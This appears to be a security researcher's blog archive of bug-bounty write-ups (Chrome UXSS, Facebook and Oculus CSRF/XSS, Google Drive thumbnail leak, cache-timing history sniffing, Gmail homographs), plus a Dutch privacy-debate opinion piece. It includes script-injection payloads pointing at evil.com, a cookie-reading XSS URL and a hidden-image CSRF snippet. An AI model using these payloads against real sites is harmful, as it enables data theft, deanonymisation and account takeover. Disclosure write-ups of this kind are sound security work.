A tale of two offline Chrome UXSS vulns


Every now and then I feel the urge to fiddle with things you wouldn’t really expect to be vulnerable. Once in a while some unexpectedly interesting results turn up.

UXSS or universal XSS vulnerabilities are interesting because they rely on a vulnerability in a web browser and aren’t generally affected by a website’s XSS protection. They could be abused to steal content and tokens from sites like Facebook and Google, or in this case, they even have access to your local file directory. Not exactly something you want to happen.


Some day this summer, I was tired looking for regular XSS vulnerabilities so I decided to take a leap of faith and look after an UXSS in Google Chrome. I must have been extremely lucky, cause within a short period of time I found not one, but two of them. Unfortunately they did require some unusual user interaction, but they were certainly interesting enough to get them fixed and rewarded by Google.

UXSS’es often exploit privileged situations where some piece of code is mistakenly allowed to access or modify a page loaded in an iframe or window. Sometimes flaws in the renderers are abused that somehow turn creative payloads into valid HTML. Digging into the latter, I noticed page pages are actually handled by a separate parser upon saving them for offline viewing. So I started saving a bunch of pages using CTRL + S to spot the difference.

The first thing I noticed was this thing called “Mark Of The Web”, which indicated the page source and is inserted at the top of each page. We’ve probably all seen it before:


I went for the obvious and tried to break the HTML comment appending “–>” followed by some HTML.


It didn’t work out


As you would expect, my payload got URL encoded. Browsers don’t usually encode the fragment identifier (the part after the hashtag in an URL) so I decided to give it one last try:


Now guess what…


Oh my god. It worked:


That was pretty cool. The attack scenario isn’t that impressive though: we’d have to pass a link like


And then our victim would need to save the page and open it afterwards. Could be better right?

I tried to look for a way to auto-save the target page using the download attribute:

<a href=”https://www.fb.com#–><script/src=http://www.evil.com/a.js></script>” download>Click me</a>

Then I would automatize this using JS, and open the pages locally. Since we’re accessing the pages using the file:// protocol, the X-FRAME OPTIONS header does not apply and we can load the downloaded pages in a hidden iframe, appending the malicious script we’d like to insert. It’d look like this:

<iframe src=”./download.htm#–><script/src=’http://www.evil.com/a.js’></<script>” style=”display:none”></iframe>

Upon saving this page, the victim would inject the malicious script into the downloaded files. When the saved page is then opened, the injected scripts would execute and steal the content. Because this all happens locally, using file:// protocols, the attacker also has access to the local file system and the directory structure.

The final result looked like this:


Video PoC extracting my Facebook messages, mails and directory structure:



While fiddling with the issue described above, I noticed another bug in the ‘save as’ parser which would turn a properly escaped href anchor attribute into valid HTML:

<a href=”http://www.example.com/#&quot;&gt;&lt;script&gt;alert(0)&lt;/script&gt;“>link</a>

Upon saving, the HTML snippet above would turn into

<a href=”http://www.example.com/#”><script>alert(0)</script>“>link</a>


The cool thing about reporting this one is that the actual PoC was embedded on the page itself: in order to reproduce the vuln, the only thing they’d have to do was to save the page and open it afterwards.


Google patched the issues in Chrome 48 and rewarded both of them with a $500 bounty each.

Happy hunting!




Surfing the web anonymously ain’t easy. Just like committing the perfect crime, the slightest detail could possibly reveal your identity.

A couple of months ago  I set myself a challenge: finding a way to get information as possible from a visitor. There are several ways to gain insights in the identity of your visitors. Google Analytics can provide general demographics and geological stats, third party cookies can track their browsing behavior and IP addresses sometimes reveal their location.

But I wasn’t looking for general info. I wanted to really get to know my visitors. Individually. From their middle name to their favorite dish – the more I’d get to know, the more my project would succeed. And who could think of a better information source than social media?

Knock – knock. Who’s there?

Getting a user’s real name proved to be quite easy – at least if they have LinkedIn. The business oriented social network has this (creepy) functionality to let people know who visited them. So I set up a test account. The only thing left was to include this HTML snippet:

<img src=”https://www.linkedin.com/profile/view?id={USER_ID}” style=”display:none”/>

This is essentially an intended CSRF vulnerability. When the visitor’s browser tries loading the image, LinkedIn will interpret this as a valid profile visit, thus revealing the person’s name to the website owner. Luckily, LinkedIn offers their users the option to remain anonymous under account settings.

The visitors name is most often the key to lots of other information, depending on your Google skills and what they’ve shared with the web.

That’s all, folks?

Nope. ”Get their name and Google them” sounds a bit cheap, right? We want private information that’s not even of Google’s business.
The following attacks require a bit more time to set up, but with a specific goal in mind, they can be quite effective.

If we got lucky, we managed to get the visitors name in a single request. Simple requests can reveal a lot about you. I find it intriguing how the simple basics of web browsing can be exploited in certain contexts.

Upon requesting stuff that’s none of your business, Facebook used to throw a 404 NOT FOUND error. Your browser will interpret this as a failure: you requested something that doesn’t appear to exist. Additionally, it can trigger the onfailure event bound to the AJAX request.

In case the facebook user does have the permission to view a specific file, you’d get a 200 OK response, triggering the onsuccess event bound to the AJAX request. Explained in a simplified diagram:


In short: in a single AJAX request was able to check whether a Facebook user had the permission to view a file or page or not. So what can we do with this?

  1. User specific identification
    By sharing an attachment with a single of multiple person, you can easily distinguish whether the visitor belongs to this group simply by making their browser send a request to this file. This makes it possible to hide specific blogposts from your wife, boss or competitor – if they’re logged into Facebook

  2. Who’s the admin of page x or application y?
    Simply by sending a request to the settings panel of a specific Facebook page / application, you could tell who’s the owner of a specific page.
  3. Is my visitor in Facebook group z?
    You just had to share an attachment in a group and you’re all set! Simply make your visitor send a request to this attachment and do as you please!
  4. Does my visitor has a specific app installed?
    Yup – you could instant ban Farmville players. It’d make the internet a bit brighter, wouldn’t it?
  5. … also works for events and such


My PoC looked like this (screenie from the video I sent to Facebook).






I reported this issue to Facebook. They implemented a site-wide fix and thanked me with a nice bounty.



Social networks can tell a lot about your visitor. But who cares nowadays? There’s only one thing users are really afraid of when it comes to privacy.
Let’s uncover the answer to one of our deepest fears:

“Can a website check my porn history?”

or – for the non-existing women reading my blog:

“Can I remotely check whether my boyfriend watches porn?”

Ethics aside, it seems to be possible. In fact, you can check this for most websites – I only targetted porn to get your attention. The actual technique is a bit hacky, but works in general. A while ago, I put up this dutch (sorry!) website that could tell what porn sites you visited:

Screenie. It says: “Busted! It seems you visited pornhub!”
https://www.benjijeenpornomens.be (roughly translated as ‘Are you a porn person’, click on the big orange button to see your results. When nothing was found, “Wisserke” should appear)

The test relies on this basic browsing principle we know as caching: upon visiting a webpage, certain files are stored locally. Next time you visit this page, these files can be loaded locally, minimizing the data traffic and speeding up the load.

The script takes a specific file that’s present on all pages – let’s say logo.png. Then it measures the loading time of logo.png + Math.random(), which won’t be present in the cache, and repeats this process until it has a reliable amount of samples. By comparing the loading time of these uncached samples with the loading time of the possibly cached logo.png, we can tell whether the webpage was visited previously – as the original request will load considerably faster.
Simplified diagram showing how the cache works:

Go ahead and try it yourself, just don’t forget to clear your cache afterwards. Safari users may have to set their cookies setting to “always allow” temporarily.

Both websites as users can take steps to mitigate this problem. Websites can limit the caching on sensitive files, while users can regularly clear their cache and use incognito / private mode (beware though: when the test is executed in the same incognito session, it will still work.

That’s it for today. Comments and feedback are more than welcome!
I found some nice Chrome bugs lately, by the way. Expect another write-up soon.

Happy hunting!


Did you like this write-up? Follow me on twitter for updates!



LinkedIn reveals your name, simple requests to Facebook used to tell a lot about a visitor, your cache can be abused to detect whether you visited porn.

How a metal festival lead to a gdrive vulnerability


I occasionally work for one of Europe’s greatest metal festivals : Graspop Metal Meeting in Belgium. With the 20th edition coming up this year, the organization put together an amazing line-up. I’m not an expert in organizing a festival – but one thing I’m for sure: you don’t want that line-up to get leaked.

Bands and tour managers may get quite upset when this happens, as they sometimes depend on the sales of other gigs in the neighborhood. As some of these desired secrets are transferred online, you need to make sure to double-check the safety of the communication tools you use. This is how I discovered an interesting vulnerability in Google Drive.


I recently read about @tomvg’s Google Drive Clickjacking vulnerability and thought a thumbnail leak could be quite interesting for line-up leaks, knowing that thumbnails can be rescaled to a 2048×2048 resolution. At this resolution, you could easily read the band names from the latest poster.

Thumbnails on the Google usercontent domain are publicly available if you’d know their unique token

I noticed thumbnails can be displayed to people who aren’t allowed to see the actual file. You’d only need to figure out their unique link that’d look like this:


Thumbnail stored on lh4.google.com/token

There is absolutely no way to link the long-token above to the actual file ID. It can’t really be bruteforced, so the attacker would either manage a way to make the victim leak the token or extract the token from the file himself. But this last case, the attacker would have had access to the file, so he could have downloaded it right away. Right? Well, not entirely.

The unique thumbnail links are the same for different file revisions

It’s true that the attacker could have downloaded a file when he temporarily got access to it. However, Google Drive has an interesting feature called file revisions, allowing file owners to upload a new revision under using same file ID and thus using the same thumbnail token.

New revision, new content same thumbnail link (lh4.google.com/token)

Gotcha! If an attacker would somehow have temporarily received access to a specific file, then got revoked access and the file got updated afterwards, he would still be able to see changes to the thumbnail. Sounds like an edgy scenario – especially if I tell you those tokens expire after about two hours. So I kept digging.

Unique links expire after +/- hours. Bummer!

Back to my initial concept: having the victim leak the current thumbnail token. And what would be even more ironic than having the victim explicitly dropping us the token? Yes – I’m talking about drag and drop.

I previously said I don’t trust copy-paste, but I don’t really trust drag-‘n-drop either.

Each Google Drive file has a unique thumbnail URL that displays the latest thumbnail. You can access it by going to


This link does not expire and only takes the file_id. Interesting! Unlike the static lh4 image it redirects to, this page is protected by authentication. Only the document owners are able to access it. Dang!

I was about to give up, until I noticed we could load the /thumbnail page within an iframe:


Do you see what’s so interesting about that? I’ll give you a moment to figure out.

Yup, we could simply embed the page in an iframe and have the victim drag and drop the static l4.google.com image to your server. As we can’t really drag-‘n-drop images over the web, most browsers would just paste the image link into a text area. Exactly what we need.

We can exploit drag ‘n drop to bypass COR protection and fetch the unique link from an iframe

There are some browsers restrictions that prevent this particular attack scenario from happening. One of them is that you’re not able to drop content extracted from an iframe in a window into a text field on the same window. We can easily bypass this by having our victim drag-‘n-drop the image link to another window that doesn’t know where the data comes from.

But then there’s this other thing: image previews. When dragging an image, you’ll see an opaque thumbnail of the content you are dragging. Only a moron would continue his actions when the confidential festival poster would popup out of nowhere, so I had to find a creative fix to work around that.


This is the moment where a neat CSS trick comes in. We can use the scale property to scale down the inners of an iframe. I just had to scale the image in a way that it wouldn’t be recognizable to the victim  – to I scaled the image to about three by three pixels.


CSS can be used to manipulate the visual drag and drop protections

At this point, I’ve had everything in place to write some sort of game that would make a victim actually trigger the exploit.

You can see the exploit in action in this YouTube video:




This bug qualified under Google’s vulnerability report program. I’d like to thank the Google Security team for their prompt and friendly responses.

P.S. Make sure to check out this year’s killer line-upTickets are still available!
Happy hacking!


[NL] Opinie: DocVille privacy debat

– klik hier voor een PDF document waarin ik mijn licht werp op responsible disclosure, en waarom ook jouw bedrijf ermee moet starten –

Dinsdagavond 5 mei debatteerde @DocVille_BE over online privacy, na vertoon van Laura Poitras’ Snowden documentaire “CitizenFour”. Panelleden waren Caroline De Geest (beleidsmedewerker Liga voor de Mensenrechten), prof. Guido Van Steendam (KULeuven), Wauter Van Laethem (Vast Comité van Toezicht op de Inlichtingendiensten), Inti De Ceukelaire (ikzelf als ethisch hacker) en Bart Tommelein (Staatssecretaris voor Bestrijding van de sociale fraude, Privacy en Noordzee), Willem Debeuckelaere (Voorzitter van de Belgische Privacycommissie). Het geheel werd gemodereerd door Dominique Soenens van De Morgen.

Als 19-jarig jonkie mocht ik uit mijn rol als ethische hacker aansluiten. Het werd een interessant debat met een breed scala aan meningsverschillen. De NMBS belette me echter het eind van het debat uit te zitten, waardoor ik op het heetst van de naald het debat moest verlaten om mijn aansluiting te halen. Op de trein naar huis schrijf ik mijn ervaringen als moeial met de “grote mensen” neer. Ik probeer zo weinig mogelijk te citeren of verwijzen, omdat mijn mening sterk gekleurd is. Onderstaande tekst beschrijft mijn persoonlijke ervaring en dus niet noodzakelijk de absolute mening van de fijne co-panelleden.

“De technologiesector evolueert sneller dan ons wetboek, met internetcriminaliteit op kop.”

Het begin van het debat richtte zich vooral op de inhoud van de documentaire. De aanpak van de Belgische inlichtingendiensten en de vermeende samenwerking met de NSA werd besproken. Dat zou volgens de ene wél, volgens de andere dan weer niet gebeurd zijn. Éen ding is zeker: de overheid verzamelt heel wat persoonlijke gegevens. Enfin, niet noodzakelijk de overheid zelf, maar allerhande operatoren, bijvoorbeeld uit de telecomsector. Via de omstreden dataretentie wet zou deze opslag worden gestandaardiseerd. Wat dat precies inhield was me niet geheel duidelijk. In mijn ogen komt het weer op hetzelfde neer: er wordt een jaar lang metadata opgeslagen, en die wordt ergens gestockeerd. Verspreid over operatoren, elk met een eigen veiligheidsbeleid.  Wat me als juridische leek wel duidelijk was, is dat het allemaal heel complex is. Bovendien is er controle. Veel controle, werd ons beloofd. Controle en complexe analyses nemen hopen tijd in beslag, waardoor de Belgische privacy machine misschien toch niet zo geolied is als we zouden hopen. De technologiesector evolueert sneller dan ons wetboek, met internetcriminaliteit op kop.


Biedt controle dan écht zekerheid? In mijn ogen maakt dat gewoon dat we een hogere schakel moeten omkopen. Of hacken. Bovendien zouden hier en daar occasionele “uitzonderingen” kunnen gemaakt worden, wat het dan weer volledig op zijn kop zet: als ze aan je data willen geraken, dan kunnen ze het.  Dat doen ze al decennia trouwens, in een stroomversnelling sinds 9/11. De overheid is actief aanwezig op het hacktoneel en ik geloof niet dat ze zich zullen terugtrekken. Dat hoeft misschien ook niet. In een ideale wereld wordt de vergaarde data enkel en discreet gebruikt voor het verbeteren van de staatsveiligheid. Hackers komen van pas. In oorlogstijden werden overheidshackers zelfs opgehemeld. Een populair voorbeeld is de film “The Imitation Game”, waarin de Britse inlichtingendienst olv Alan Turing de duitse Nazi code kraakte – een waargebeurd evenement dat uiteindelijk bijdroeg aan het einde van de oorlogBovendien willen wij de lekken vinden, voor dat terroristen dat doen, right?


“Het huidige internet is een gigantische speeltuin voor malafide computernerds.”


Het probleem ligt niet zozeer bij de overheid en hun ondeugendheden zoals het omstreden PRISM program – het ligt aan onze perceptie van privacy in’t algemeen. Online voeren we met veel plezier onze persoonsgegevens in en we gaan er van uit dat die daar veilig zijn. Mispoes. Online databases zijn een goudmijn voor malafide hackers, die zich immers nog minder moeten verantwoorden voor hun daden dan de overheid. Het probleem is dus niet echt dat zo’n zaken gebeuren, maar dat ze kunnen gebeuren. Onze gegevens worden onvoldoende beschermd. Het huidige internet is een gigantische speeltuin voor malafide computernerds.

“Gigantische hacks vertrekken vaak uit de meest ontschuldige websites. Je bent zo veilig als je zwakste schakel.”

Bedrijven moeten vervolgd worden voor nonchalance in hun online veiligheidsbeleid. Tommelein, die naar eigen zeggen “niet graag nieuwe regeltjes bij maakt”, vindt het – als ik hem goed verstaan heb –  voldoende om de bedrijven vriendelijk te vragen om hun security in orde te stellen. Maar zo werkt het niet. Veiligheid kost bedrijven hopen geld en op publiek onzichtbare inspanningen wordt er gemakkelijk bespaard. Er zou volgens Tommelein een groot verschil zijn tussen grote bedrijven en kleinere, zoals KMO’s. Budgettair klopt dit helemaal: een lokale fitnesclub heeft niet evenveel budget voor beveiliging als de staatsveiligheid. In realiteit blijven de KMO’s een perfect doelwit bij geavanceerde hacks: vaak wordt de zwakste schakel van de te hacken persoon gezocht en die misbruikt. Gebruik je het zelfde wachtwoord op een onbeveiligde website als voor pakweg je e-mail? Dan hang je. Gigantische hacks vertrekken vaak uit de meest ontschuldige websites, zoals de webshop van je ma. Je bent zo veilig als je zwakste schakel.

“Stop minder energie en budget in het opsporen van hackers. Fix your shit.”


De privacycommisie haalde aan dat er wel degelijk vervolgd wordt bijdiefstal van data. Dat klopt, maar daar wordt de focus gelegd op de verkeerde persoon, namelijk de hacker zelf. Na een hack moet een bedrijf zich in de eerste plaats afvragen hoe zoiets is kunnen gebeuren, meer dan wie er achter zit. Vaak gaat het om onbereikbare buitenlandse criminelen en is de gestolen data toch lustig gekopieerd over het internet. Vervolgen uit wraak heeft weinig zin. Voor elke hacker in’t gevang komen er twintig bij. De getroffen klanten hebben er ook geen baat bij. De oplossing? Fix your shit – en communiceer met getroffen klanten (tot op heden niet verplicht). Beter voorkomen dan genezen natuurlijk.

“De basis voor de huidige privacywet dateert uit 1992. Toen was ik nog niet geboren, en was het internet van vandaag verre fictie”

We hebben nog een lange weg te gaan. Een staatssecretaris voor privacy? Fantastisch initiatief. Bedrijven geen verplichtingen opleggen om inspanningen te leveren voor het beschermen van onze gegevens? Minder. Ik dacht dat dat vanzelfsprekend zou zijn. Zeker nu we werkelijk alles linken aan het internet. Hoera voor de digitalisering! Alles online! Ook vitale instellingen zoals bijvoorbeeld ziekenhuizen doen guitig mee. Wie gaat er opdraaien voor de eerste internetmoord? Eenmaal binnen is het aanpassen van een bloedgroep is een relatief kleine verandering die onopgemerkt kan voorbijgaan. Het wordt tijd dat we onze privacy wet eens omgooien en moderniseren. De basis voor die tekst bestaat immers al sinds 8 december 1992. Toen was ik nog niet eens geboren, en was het internet van vandaag verre fictie.

Het zou hypocriet zijn af te geven op het huidig systeem zonder een alternatieve oplossing te bieden. In dit PDF document doe ik mijn plan uit de doeken. Perfect is het niet, maar het biedt zeker en vast enkele interessante stappen naar de toekomst toe.

“De overheid hoeft ons handje niet vast te houden in de strijd tegen privacylekken”

Verandering? Het komt er hoor.


Na 342 controles en 210 complexe analyses, misschien. 

Maar tegen dan zitten we weer achter.
Ondertussen roep ik iedereen op om uw gezond verstand te gebruiken op het internet. De overheid hoeft ons handje niet vast te houden in de strijd tegen privacylekken. Bescherm uzelf, en weet vooral wat je op het internet zwiert. Privacy is een illusie op het web, een belofte die niet volledig kan worden nagekomen. Als je daar van uitgaat, is het internet heus nog niet zo eng.


Why I don’t trust copypaste

Whoever invented copy/paste was a genius.  But did you know our ctrl-c ctrl-v  smashing adoration sometimes leads to security problems? Here’s why.

Nowadays, everything needs to go fast and fluently. Security sometimes pays the price of this trend.
Combining user experience with security: it’s a tough balance to strike. The faster a message can get to its reciepents, the better. Today I experienced this using Facebook chat.

I was talking to a good old friend when I accidentally hit ctrl-v instead of ctrl-c. Normally, this would be no big deal: I’d immediately notice my mistake and correct it. My friend wouldn’t notice anything.
But things went different this time. I was working on a photoshop project earlier that day. The data stored in my clipboard was not clear text, but an image. Facebook seems to treat images in a different way: it sends them right away, without having the need to press enter or “send”. Long story short: I sent my friend some image data from a project I’ve been working on. Not a big deal, or is it?

As a security practitioner, I immediately started thinking about a possible exploit scenario. Found it.

I knew my friend @smiegles had just saved a screenshot to his desktop. So I approached him explaining I was doing research on some social engineering attack and asked him to go to this page and get the “secret code” for me.


In return, I did not get the code. I got something better:

Translation: how the fuck?

Yup, got my hands on that screenshot without the “victim” even having a clue. That’s because the victim would not copy anything of the “secret code”. This can magically be done using just three lines of javascript code:

document.oncut=new Function(“return false”);
document.oncopy=new Function(“return false”);
document.onpaste=new Function(“return false”);

Go ahead: right click > copy or smash ctrl-c as much as you want: it won’t work. And even better: you won’t even notice. While you think you’re helping your friend out, you’re actually sending him your old clipboard data. Without any verification. Aauuuch!

I sent this issue over to Facebook but due to the social engineering elements involved, it got labeled as a won’t-fix.
So make sure to always verify what you’re copy/pasting!
Hope you enjoyed reading about this trivial bug. Shoutout to @smiegles for helping me test this little bug.

Stay tuned for more and make sure to follow me on twitter.

See you next time!

Hacking Facebook’s Oculus

Let’s talk about Oculus VR, known best for their 2012 kickstarter funded Oculus Rift, a popular virtual reality headset. Earlier this year, Facebook acquired the company for $2 billion, making it an interesting new target in Facebook’s bug bounty program.

I was late to the party. Their inclusion in Facebook’s bug bounty was already announced for a few weeks, and I was pretty sure the low-hanging fruits were already gone. I nevertheless started my quest for valuable bugs and did eventually find where I was looking for.

In this blogpost, I will address each issue individually. I’m going to start off with the account takeover vulnerability, without a doubt one of the most interesting bugs I encountered in Oculus land.

1. From joining any group to complete admin account takeover

aka the administrator list: where security researchers meet

Creating an account at the Oculus developer center, you can either sign up as an individual or as part of a company.
Once you have your e-mail address verified, you can automatically choose any company related to your verified e-mail domain. If you’d for example manage to verify an @facebook-inc.com e-mail address, you would we able to join either Facebook, Instagram, Oculus, Parse or Moves. My goal was to join the Oculus company without having to verify an @oculusvr.com e-mail address.

I could either

  1. Find a way to bypass the verification process
  2. Look for a privillege escalation to change my company

It did not work. So I clicked next and proceeded to the last registration step. Once I had chosen a company associated to my verified e-mail domain, I could choose to work an existing project – or choose a new one.


Here the things got quite interesting: I noticed the CSRF token we saw in the choose-a-company form was not present this time. This cross-site request forgery issue would allow us to make someone from the same company change its project… to another project of the same company. Not that exciting, huh?


I tested once again. This time, I choose a project with an id that was not associated to my company. I was shocked to see I indeed was able to join another company’s project, in fact, I even did join the company. Cool! I could join the Oculus Team and view some confidential details such as e-mail addresses ect. At first, I did not realize this privillege escalation and CSRF would actually allow me to take over accounts.

As a company administrator, were are able to edit  all the details of the company’s linked employee accounts. Even the password and the e-mail address.
So here was the deal: all I would need to do is use the CSRF to make someone join one of my company’s project and change his password. Bazing! We are able to hack Oculus accounts. But things got a little crazier. Just a little.

After reporting this bug to Facebook, I tried to reproduce the issue again. This time, I would use my company’s administrator account to join the Oculus team. I could not believe my eyes: I was still a company administrator. From the Oculus Team, this time. Long story short: I could hack any Oculus account without user interaction. I’d simply join their company – as a company administrator – and change their password.

Oculus_1 Oculus_Overview Oculus_5

Fun fact: it was nice to see my colleague Stephen Sclaphani in the company admin list using another vulnerability. Well done, Stephen!

Long story short: things escalated quickly. From a lame CSRF, to an interesting privillege escalation CSRF, to an account takeover CSRF, to a complete account takeover without user interaction.


Vulnerability timeline:
September 5th, 2014 02:39AM – Reported to vendor
September 5th, 2014 02:40AM – Vulnerability confirmed by vendor (! Check the response time !)
September 8th, 2014 02:50AM  – Vendor asks for fiw confirmation
September 8th, 2014 02:52PM  – Fix confirmed
October     15th, 2014 09:46PM – Bounty awarded

I did get a nice reward for this bug, but it did not even get close to Bitquark’s 5k for a similar account takeover. This is due to the fact that Facebooktook additional steps to mitigate the risk of account takeovers and decreased the payouts accordingly. I am nevertheless very happy with the award and want to thank the Facebook security team for their fast and friendly responses.

During my quest for Facebook bugs, I found some other valuable bugs I’m about to describe below. Enjoy!

2. Privillege escalation leading to cross site scripting

A company may have multiple e-mail domains linked to it. This can be done in the “Access Control” pannel only the company administrator can use. These domains are included in various forms as a joined array, as well as in the “update project” form:


As you can see, we got two domains listed: ceukelai.re and mailinator.com. I tried to submit the form without those listed and it just wouldn’t work. Then I tried adding another domain. I changed the field “domains” to ceukelai.re;mailinator.com;gmail.com. I was amazed to notice that gmail.com was magically added to my domain list – even though the use of public domains is not allowed. So it must have passed some security checks. I did not hesitate to test whether the XSS filter was bypassed as well – and my assumption was right: I could add and execute malicious javascript payloads every time one would visit the access control page. In fact, not only I could achieve this: as this was a privillege escalation as well, any company user could do so.


Facebook rewarded me for both bugs with a nice and generous award. I would like to thank them for this! It’s always a pleasure working with them.

Vulnerability timeline:
August 26th, 2014 11:00PM – Reported to vendor
August 27th, 2014 09:41PM – Vulnerability confirmed by vendor (got a “PS: Nice work, Inti!” – reply as well. Awesome!)
September 8th, 2014 02:48AM  – Vendor asks for fix confirmation
September 8th, 2014 02:26PM  – Fix confirmed
September 9th, 2014 08:51PM – Bounty awarded

– Privillege escalation
August 26th, 2014 11:08PM – Reported to vendor
August 27th, 2014 09:31PM – Vulnerability confirmed by vendor
September 8th, 2014 07:12PM  – Vendor asks for fix confirmation
September 8th, 2014 07:41PM  – Fix not confirmed, still some nasty side-effects present
September 16th, 2014 11:05PM – Vendor asks again for fix confirmation
September 17th, 2014 12:09AM – Fix confirmed
September 17th, 2014 12:53AM – Bounty awarded

3. Another privillege escalation leading to cross site scripting

If you liked the previous  bug combo, you will definitely like this one. It’s a bit more complex and therefore one of my favorite’s.

Remember the “update project” form I told you about earlier? It includes a CSRF token. That’s good, right? Yes, but it is a bad practice not to change your tokens for every form you generate. This bug will explain you why.

Upon registration, when a user is asked to join a company linked to his or hers company domain, he is also able to create a new one. To create a new company, the user is prompted to give some more details on the company in question, such as phone number, street address and website. The user needs to make sure the information provided is valid because – and this is important – these details cannot be changed later on.


Of course I tried to inject all kinds of XSS payloads into these parameters: tests that haven’t really got me far. I did notice that the company registration was processed by the same script used to update profiles. In fact, there were quite a lot of similarities. Even the form token was the same. Only CompanyTypeId was different:  COMPANY instead of PROJECT. Interesting!

updateprojo updateprojo_src

So this wild idea began to haunt my brains: what if I could use the “update” action command to change my company details? I could perfectly use the form token provided in the update project form: it would be the same. So I made myself a new form with some elements of both forms combined, “the best of both worlds”: the company detail parameters from the “create company” form, and the CSRF token and update action from the “update project” form.

It felt a bit like making Frankenstein and hoping it would come to live when it gets hit by a lightning. “This is never going to work”. Until I executed the script and head back to my company details: it worked.

So wow, another privillege escalation allowing any company user to change the companies details. But then I thought of my previous bug: would this bypass the XSS filter once again? Turns out I got it right. Boom!


Vulnerability timeline:
September 5th, 2014 05:17PM – Reported to vendor
September 6th, 2014 02:29PM – Vulnerability confirmed by vendor
September 25th, 2014 12:20AM  – Vendor asks for fix confirmation
September 25th, 2014 03:50PM – Fix confirmed
October 14th , 2014 01:58AM – Bounty awarded

4. Reflected XSS

Whoosh. That was heavy! Time to light things up a bit, with this low-profile, yet funny, reflected XSS!
If you want do download a particular game at the Oculus Share center, you first need to accept some terms and conditions. Then it takes you to your download link.

Do you see – what I see? The temptation for changing the “redirect” parameter to javascript:… was quite irrisistable. Aaaaaand… it did not work.
Déja vu. If I had learned something from the bugs described above, it must be that things will never work out from the first try.

From some further test, I learned the script would just check whether oculusvr.com or oculus.com is present in the parameter. That’s all. Can you see what’s wrong with that? Heck, I do: https://share.oculusvr.com/accept-revised-terms?redirect=javascript:alert(document.cookie+”oculusvr.com”)



Vulnerability timeline:
September 9th, 2014 03:00PM – Reported to vendor
September 9th, 2014 11:57PM – Vulnerability confirmed by vendor
September 26th, 2014 09:02PM  – Vendor asks for fix confirmation
September 26th, 2014 09:12PM – Fix confirmed
October 14th , 2014 02:20AM – Bounty awarded

5. The dupes

For being quite late to the party, the dupe ratio of 2/8 bugs was quite ok. Just a bit of a bummer both of those bugs were some sort of account takeover vulnerabilities. That’s why I decided to honor them as well in this write-up.

The first one was a password reset CSRF. If a company administrator adds a user to his company, the employee gets a temporary password and an activation link. After clicking the activation link, the user would be prompted to choose a new password. Interestingly, this form was not protected by any CSRF token, which made it possible to make someone reset his password without he or she even knowing. Here was my video PoC:


The 2nd account takeover I found was a bit less interesting, but nevertheless interesting. The developer center is closely linked with the discussion board: if you register an account to the developer center, a forum account will be created as well. When you delete your developer account, the forum account did not get deleted. I tried to create a new user with the same name as our orphan forum account – and guess what? I could regain access to it. In short: when one’s developer account was pruned, the forum account that was left behind could be claimed by anyone registering under the same name.

That was all for today. If you are interested in reading more about Facebook’s bug bounty program, this would be the place to be.

If you are interesed in more detailled write-ups, make sure you follow me on twitter!

Happy hacking!

[Dutch] ‘Zero days’ documentary featuring @smiegles @k8em0, @mikko & @Viss

The dutch broadcast channel “NPO2” made a documentary about Zero Day exploits, responsible disclosure and HackerOne. The broadcast features @k8em0, @mikko, @Viss and @smiegles, a young dutch bug bounty hunter and friend of mine.

You can watch the zero day episode here:


Besides this I have some exciting news: this thursday (16/10) I will be featured in a documentary on Responsible Disclosure on the national Belgian broadcast channel. If you are interested in watching it, tune-in around 8.40pm for the television show “Koppen” at broadcast channel “één”. I will post a link to the documentary later on.

That’s all for now!

Gmail’s SMTPUTF8 prone to homographic attacks (thanks, 4chan!)

I always loved working with Google.

I have been participating in their program since 2012. Over the years, I addressed some nice vulnerabilities that got me a couple of hall of fame entries and of course some nice monetary awards. But this last time, I drew a blank.

I spent some time researching Unicode last month. Browsing through a lot of interesting characters, two of them struck my eye: the soft hyphen and the zero with space. There characters are basically – nothing[1], except they are there. Doing a bit of research, I quickly found that these characters were used to “blank post” on the popular image board “4chan”.


Interesting. Naturally, it is not allowed to submit “empty” comments to the board – but using this single character, it was possible to bypass this restriction. Well, such a post is technically not empty. It just seems like it is. I started wondering whether this could lead to some security implications in popular websites. Except for some low-priority design bugs I did not find anything.

[1] The soft hyphen does have a functionality: it indicates where to break a word.


Months passed by. I had forgotten about the special Unicode character and moved on, looking for new and unique bugs. Until I post on the Google Blog:


Gmail would now support e-mail addresses with Unicode characters. The extraordinary characters from earlier popped up in my head and I had this crazy idea:


Can you spot the difference? I can’t. But believe me – they are different. The 2nd one has a soft hyphen between “in” and “ti”. So technically, this gives us an e-mail that appears to be the same, but isn’t. So what’s the big deal?

Monday morning at work. You receive the following mail from your colleague, who happens to be me.


You recognize my e-mail address and send me the document. Or did you? You actually replied to in­ti@dece­ukelai.re instead of inti@deceukelai.re, without ever noticing you have been tricked in. Sounds like a problem to me.

After reporting this bug, it got miraculously fixed, even though my initial test show that the vulnerability did exist. I noticed, however, that it was still possible to use a homograph attack mixing look-a-like characters of different character sets (e.g. latin and greek).



Even though these e-mail addresses may look the same, they are not: the first letter (blank one) of the e-mail address is a look-a-like character of some other script.So let’s say you send a mail to


You think you are sending your message to me, but you are not, as the “e” of “de” is a letter from another alphabet. Say the server, in this case Gmail’s supports the creation of SMTPUTF8 e-mail addresses (they will, shortly), then this e-mail could be delivered to a different user without anyone even noticing.

I reported this additional information to Google and they replied that they are working on it, but also that my report does not qualify for a reward.

I am publishing this to show the dangers of the new RFC6530 e-mail standardization. While I do believe globalisation is a good thing, we should watch our steps toward it carefully.  Nobody wants to get lost in translation.

I was a bit “feeling unlucky” to see my work did not get rewarded. But that’s life, I guess.
Luckily, I found some vulnerabilities at Facebook that did get a generous reward. I will do a write-up on those soon.
Stay tuned!

Exploit – Hacking the PlayStation Portable

Before I got into web security, I was involved in the PlayStation Portable Scene, operating under the alias TiPi. During this period of swinging somewhere between script kiddie and ambitious newbie, I accidently found my first bug while testing my device’s capibilities. Little did I know that this would later turn out to be a fully working VSH (usermode) exploit that could be combined with a kernel (admin) exploit, enabeling root access on all of the latest PlayStation Portable Devices. This leak would be formely known as VSHBL.

My first steps into the hacking world, hooray!

As the secret keys used to sign PSP software leaked out during this period, we haven’t really got to releasing this exploit. I did however write a guide on the stuff that I learned that you may find interesting. Even though the guide dates back from 2011, I’d still like to share the link here.


I hope you enjoy reading this little piece of literature. Stay tuned for more!


Before we get into bussiness, let’s get to know each other.

My name is Inti. I live in some small European country people call Belgium – short for fries, beer and chocolate.

I prefer breaking things over making things. As a child, I was always fascinated on how things work – eventually I’d just pull them apart until they broke. As a computernerd, I’m still kind of doing the same:

